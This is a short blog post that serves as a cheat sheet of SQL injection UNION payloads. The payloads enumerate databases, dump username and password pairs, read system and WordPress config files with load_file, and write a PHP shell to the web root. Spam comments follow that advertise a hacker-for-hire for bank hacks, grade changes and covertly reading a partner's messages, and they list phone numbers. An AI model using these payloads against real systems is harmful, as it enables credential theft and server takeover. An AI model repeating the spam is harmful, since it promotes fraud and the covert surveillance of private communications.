SQL INJECTION – Extracting Username and Password From Database
Hello! Pentesters, In this article, We will hunt How to extract Database Name, Table_Name, Column_Name, and even USERNAME and PASSWORD from a Database.
Some Basic SQL Command:
- user()
- version()
- database()
1) Find Out User Information
- union select user()
- union select database()
- union select version()
2) Find Out Database Name
- union select group_concat(schema_name) from information_schema.schemata
3) Find Out Tables Name
- union select group_concat(table_name) from information_schema.tables where table_schema=’#Database_Name’
4) Find Out Columns Name
- union select group_concat(column_name) from information_schema.columns where table_name=’#Table_Name’
5) Extract Username And Password From Database
- union select group_concat(username,’:’,password) from #table_name
6) Check All Privileges inside the Database
- union select privilege_type FROM information_schema.user_privileges where grantee = “user()” #’uhc’@’localhost’
7) Read Arbitrary Operating System File inside the Database
- union select load_file(‘/etc/passwd’)
- union select load_file(‘/etc/os-release’)
- union select load_file(‘/var/www/wordpress/wp-config.php’)
- union select load_file(‘/etc/issue’)
- union select load_file(‘/var/log/apache2/access.log’)
- union select load_file(‘/etc/apache2/sites-available/000-default.conf’)
- union select load_file(‘/etc/fstab’)
8) Create a Malicious PHP Shell Inside the Database
- union select “” into outfile ‘/var/www/html/shell.php’
Recent Posts
- Protected: How To Mount USB Drive in Ubuntu Linux
- CVE-2022-30190 (Follina)-Microsoft Support Diagnostic Tool Vulnerability
- SQL INJECTION – Extracting Username and Password From Database
- How To Dump Username And Password Using SQLMap Tool?
- Protected: Exploit Apache Log4j Security Vulnerabilities – CVE-2021-44228
The professional hacker true out the word that I believed in him is only Henryclarkethicalhacker Group Hackers Checked Google and see everybody comments on him he a professional that I believed in him if you have problems on any stuffed like a bank, company, school grades change examinations, database, Social media hacks, Email hacks, Phone hacks, Bitcoin hacks, increased Credit score boost to 800, School result upgrading, cryptocurrency, Binary option funds recovery, Bitcoin Mining, Instagram, WhatsApp, Twitter, Monitor your colleague, access your spouse social media, and a lot more, via, , on whatsapp 18134211326..
Contact him for any type of hacking, he is a professional hacker that specializes in exposing cheating spouses, and every other hacking related issues. he is a cyber guru, he helps catch cheating spouses by hacking their communications like call, Facebook, text, emails, Skype, whats-app and many more. I have used this service before and he did a very good job, he gave me every proof I needed to know that my fiancee was cheating. You can contact him on his email to help you catch your cheating spouse, or for any other hacking related problems, like hacking websites, bank statement, grades and many more. he will definitely help you, he has helped a lot of people, contact him on, , and you can Text/Call &WhatsApp: +1 (773)-609-2741, or +1201-430-5865, and figure out your relationship status. I wish you the best.
My girlfriend was very smart at hiding her infidelity from me due to some selfish reasons. So I had no proof for weeks while hurting myself during this process. Luckily I was referred to this private investigator and the result was awesome and top notch. All my girlfriend’s dirty chats, Facebook, WhatsApp, Instagram, and even phone conversations were directed to my cell phone, if your girlfriend, boyfriend, wife or husband are experts at hiding his or her cheating adventures, contact this fast and trusted link. You can reach them via, TEXT,Call & Whatsapp,+1(201)4305865, or +1(773)6092741…